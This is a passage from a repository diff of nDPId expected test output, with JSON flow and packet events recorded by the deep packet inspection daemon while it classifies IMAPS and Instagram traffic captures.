01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}}
00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":3856,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1590857744987}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 20/20

392
test/results/instagram.pcap.out
View File

@@ -1,47 +1,47 @@
00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"instagram.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436720898354}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898354,"flow_last_seen":1436720898354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720898354,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7440000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfAnCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"}
00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="}
01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="}
00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
